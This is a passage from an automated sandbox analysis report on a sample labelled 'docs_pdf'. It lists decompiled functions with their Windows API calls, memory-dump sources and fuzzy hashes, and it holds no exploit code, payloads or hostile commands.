                                                            • TranslateMessage.USER32(?), ref: 001469D2
                                                            • DispatchMessageW.USER32(?), ref: 001469DC
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001469EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                            • String ID:
                                                            • API String ID: 2108273632-0
                                                            • Opcode ID: a76288fafce7fd2256afd00b68aa6eefbc767fa4d6ed80567d5c76b8f0040eb9
                                                            • Instruction ID: 6020cbd7d69380aa74136040497897d3be4f2ced27181cdc408896aea13ca0fb
                                                            • Opcode Fuzzy Hash: a76288fafce7fd2256afd00b68aa6eefbc767fa4d6ed80567d5c76b8f0040eb9
                                                            • Instruction Fuzzy Hash: 0A31E371900646AEDB24CF74CC44BB67BBCBB2630CF204269E425D35B1D7B898C6D792
                                                            Function 00148F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00148F12
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00148FBC
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00148FC4
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00148FD2
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00148FDA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: dd844ff3a05209aded4167a8313d9f06a6dad5afca50f8d879fb60a04d95a33b
                                                            • Instruction ID: 46a041e023f6717328f85d37e79df4dfbd4f24a5b2ab2cf82cde662389a1fe10
                                                            • Opcode Fuzzy Hash: dd844ff3a05209aded4167a8313d9f06a6dad5afca50f8d879fb60a04d95a33b
                                                            • Instruction Fuzzy Hash: 7831CE71500219EFDB14CF68D94CAAE7BB6EB04325F104229F929EA1E0C7B09998DB90
                                                            Function 0014B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 0014B6C7
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0014B6E4
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0014B71C
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0014B742
                                                            • _wcsstr.LIBCMT ref: 0014B74C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID:
                                                            • API String ID: 3902887630-0
                                                            • Opcode ID: 39060b66c7cb581239a6deb6e814262569250a98cc551b710777974b57711cd9
                                                            • Instruction ID: e29cfe7f3b471dbb1d4ace1aff2b41ee62248ff574047ad84d9c291ef9595329
                                                            • Opcode Fuzzy Hash: 39060b66c7cb581239a6deb6e814262569250a98cc551b710777974b57711cd9
                                                            • Instruction Fuzzy Hash: 1121FC71608204BBEB295B799C89E7B7BACDF49721F11403DFD09CA1B1EF61DC819660
                                                            Function 0017B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0017B44C
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0017B471
                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0017B489
                                                            • GetSystemMetrics.USER32(00000004), ref: 0017B4B2
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00161184,00000000), ref: 0017B4D0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Long$MetricsSystem
                                                            • String ID:
                                                            • API String ID: 2294984445-0
                                                            • Opcode ID: 50317d51d3ef3c4ee70e81c5d053a055deaf0df2b2d5c09833eb4030a7334e74
                                                            • Instruction ID: 81e8b86328f947463e93787804481b708c311d5686e6a0519b0217bbae502b54
                                                            • Opcode Fuzzy Hash: 50317d51d3ef3c4ee70e81c5d053a055deaf0df2b2d5c09833eb4030a7334e74
                                                            • Instruction Fuzzy Hash: 35216071518255AFCB149F39CC88B6A37B4FB05720F258728F92BD75E1E7309891DB90
                                                            Function 001497E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00149802
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00149834
                                                            • __itow.LIBCMT ref: 0014984C
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00149874
                                                            • __itow.LIBCMT ref: 00149885
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow$_memmove
                                                            • String ID:
                                                            • API String ID: 2983881199-0
                                                            • Opcode ID: 33c6b703e40bf0ece515af1ca74cdc77032e0f57454e8d292713cecebd50ce60
                                                            • Instruction ID: 4f9d5af8829ed508c3700d3862f8e0437bea05190199f833d45f2f6f0889c3bc
                                                            • Opcode Fuzzy Hash: 33c6b703e40bf0ece515af1ca74cdc77032e0f57454e8d292713cecebd50ce60
                                                            • Instruction Fuzzy Hash: CF219875B0020DABDB119A698C86EEF7BB9EF4A710F044039FA09DB2A1D7708D8597D1
                                                            Function 000F12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000F134D
                                                            • SelectObject.GDI32(?,00000000), ref: 000F135C
                                                            • BeginPath.GDI32(?), ref: 000F1373
                                                            • SelectObject.GDI32(?,00000000), ref: 000F139C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: 86cbb39c006112b66bab78464ac3ed5731df686f2d460dac23d672c1eaa7fca1
                                                            • Instruction ID: a7fcd40341da55880436b6e395950aea5a536084ae284a4899933035382bbad7
                                                            • Opcode Fuzzy Hash: 86cbb39c006112b66bab78464ac3ed5731df686f2d460dac23d672c1eaa7fca1
                                                            • Instruction Fuzzy Hash: 45210E71800308EBDB119F25EC447B97BF9FB10321F14432AF91896DA1D77999E1EB90
                                                            Function 0014C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: a64a7f06c3055140f8161835599f744514e6dbb1f50655fa9ebb192e060cf756
                                                            • Instruction ID: 34686ce5bac3d4f8f751bb69835db060be3546d6e0c19088c552acfba7bef037
                                                            • Opcode Fuzzy Hash: a64a7f06c3055140f8161835599f744514e6dbb1f50655fa9ebb192e060cf756
                                                            • Instruction Fuzzy Hash: F501B5B1A06105BBE209B6209C42FBBB75C9B21BA4F044021FE04962A3E7A1EF11C7F0
                                                            Function 00154D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00154D5C
                                                            • __beginthreadex.LIBCMT ref: 00154D7A
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00154D8F
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00154DA5
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00154DAC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                            • String ID:
                                                            • API String ID: 3824534824-0
                                                            • Opcode ID: 9a9c44604dde820c3b3c432691f0e3fe8bf43775d3c35131ca45cd39b9f9b19b
                                                            • Instruction ID: 43ac49f1b039cbcb6f8259887172b0db1ca9b619604c367c7fae55369e8f1b80
                                                            • Opcode Fuzzy Hash: 9a9c44604dde820c3b3c432691f0e3fe8bf43775d3c35131ca45cd39b9f9b19b
                                                            • Instruction Fuzzy Hash: EF11E576904208EBD7019BA8DC08ADB7BBCEB55325F1443A9FD28D7650D7758DC48BA0
                                                            Function 0014874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00148766
                                                            • GetLastError.KERNEL32(?,0014822A,?,?,?), ref: 00148770
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,0014822A,?,?,?), ref: 0014877F
                                                            • HeapAlloc.KERNEL32(00000000,?,0014822A,?,?,?), ref: 00148786
                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0014879D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 842720411-0
                                                            • Opcode ID: a6edb19ac7350db9b8092145849ffb8c45b1a2b9ebe1bb6d33790eeed87d4042
                                                            • Instruction ID: 2566315b0cd605c84997dd44221cdb107ae0c463ccbcc91cd4e86eff9c79885e
                                                            • Opcode Fuzzy Hash: a6edb19ac7350db9b8092145849ffb8c45b1a2b9ebe1bb6d33790eeed87d4042
                                                            • Instruction Fuzzy Hash: 1A014B71204208EFDB204FA6DC88D6BBBBCFF89356B200439F849C2260DB318C81CA60
                                                            Function 001554E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00155502
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00155510
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00155518
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00155522
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0015555E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: eec74c392914c9712100ae8798ab8b8df092ca159618708acfb17c6975d922d3
                                                            • Instruction ID: ad2e7933f158c315f846b5c748c56e09f9d75d1996f1062647660c565f302e0a
                                                            • Opcode Fuzzy Hash: eec74c392914c9712100ae8798ab8b8df092ca159618708acfb17c6975d922d3
                                                            • Instruction Fuzzy Hash: 0C015B31C10A2DDBCF00DFE8E8989EEBB7AFB09712F41005AE815F6540EB309598C7A1
                                                            Function 00147652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?,?,0014799D), ref: 0014766F
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 0014768A
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 00147698
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?), ref: 001476A8
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0014758C,80070057,?,?), ref: 001476B4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: d4671f82849b73373349d08ff66660424ff7b1bb6453f2c758f40438c5e7a32b
                                                            • Instruction ID: 148540a1e2825810404b8129c1edb3f414e89bc5404321ab45f8db24fea04d69
                                                            • Opcode Fuzzy Hash: d4671f82849b73373349d08ff66660424ff7b1bb6453f2c758f40438c5e7a32b
                                                            • Instruction Fuzzy Hash: E9018476605614BBEB109F58DC44BAE7BBEEF45751F150028FD08D2271E731DD8197A0
                                                            Function 001485F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00148608
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00148612
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00148621
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00148628
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0014863E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 4400ef85a5abacae957ad8b09e363f90d1392cb96eac872b42b67f935da8acd3
                                                            • Instruction ID: fddff0a5258d1e69a8692ae84107a990125383cd2987e27a12ad3faf31fddf2f
                                                            • Opcode Fuzzy Hash: 4400ef85a5abacae957ad8b09e363f90d1392cb96eac872b42b67f935da8acd3
                                                            • Instruction Fuzzy Hash: 00F04F35201204AFEB100FA9DC89E6F3BBDFF89B54F500439F949C6160CB619C82DA60
                                                            Function 00148652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00148669
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00148673
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00148682
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00148689
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0014869F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 9071975968368d20562fdcfcf7d098b1d4e77346e44ae3291c492d71ead2f1e8
                                                            • Instruction ID: b05260fba8d51d78d01ef9235663fe1a5bee5002472b844a03fb9061f807b2c9
                                                            • Opcode Fuzzy Hash: 9071975968368d20562fdcfcf7d098b1d4e77346e44ae3291c492d71ead2f1e8
                                                            • Instruction Fuzzy Hash: 9DF04F75200204AFEB111FA5EC88E6B7BBDFF8A754F100029F949C6160CB619982DA60
                                                            Function 0014C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 0014C6BA
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0014C6D1
                                                            • MessageBeep.USER32(00000000), ref: 0014C6E9
                                                            • KillTimer.USER32(?,0000040A), ref: 0014C705
                                                            • EndDialog.USER32(?,00000001), ref: 0014C71F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: 9d71993528d6a6a9e3a690bc539a5ca847ecdb4083f925a3f5b5e076e6e9f2af
                                                            • Instruction ID: 703199de0e3eee306fbcd2bb0da65601cce3433973673256047539763046a6f8
                                                            • Opcode Fuzzy Hash: 9d71993528d6a6a9e3a690bc539a5ca847ecdb4083f925a3f5b5e076e6e9f2af
                                                            • Instruction Fuzzy Hash: DA014F34501704ABEB655B20DD4EFA677B8BB00746F00066DB546A18F1DBE0A9D58E81
                                                            Function 000F13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 000F13BF
                                                            • StrokeAndFillPath.GDI32(?,?,0012BAD8,00000000,?), ref: 000F13DB
                                                            • SelectObject.GDI32(?,00000000), ref: 000F13EE
                                                            • DeleteObject.GDI32 ref: 000F1401
                                                            • StrokePath.GDI32(?), ref: 000F141C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: 1d4087a3d9bd8e68d1d7efa8c09f484990dbf884c69c45bf2ca9c695b7093392
                                                            • Instruction ID: ed5cbebf412db7957288f661f87a05f71233aa85a5ad76e8037880dbbcfaf99c
                                                            • Opcode Fuzzy Hash: 1d4087a3d9bd8e68d1d7efa8c09f484990dbf884c69c45bf2ca9c695b7093392
                                                            • Instruction Fuzzy Hash: 55F0B231004308EBDB225F26EC087A93BB5AB51326F048328F52995DF1C73999E6EF50
                                                            Function 00102E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00110FF6: std::exception::exception.LIBCMT ref: 0011102C
                                                              • Part of subcall function 00110FF6: __CxxThrowException@8.LIBCMT ref: 00111041
                                                              • Part of subcall function 000F7F41: _memmove.LIBCMT ref: 000F7F82
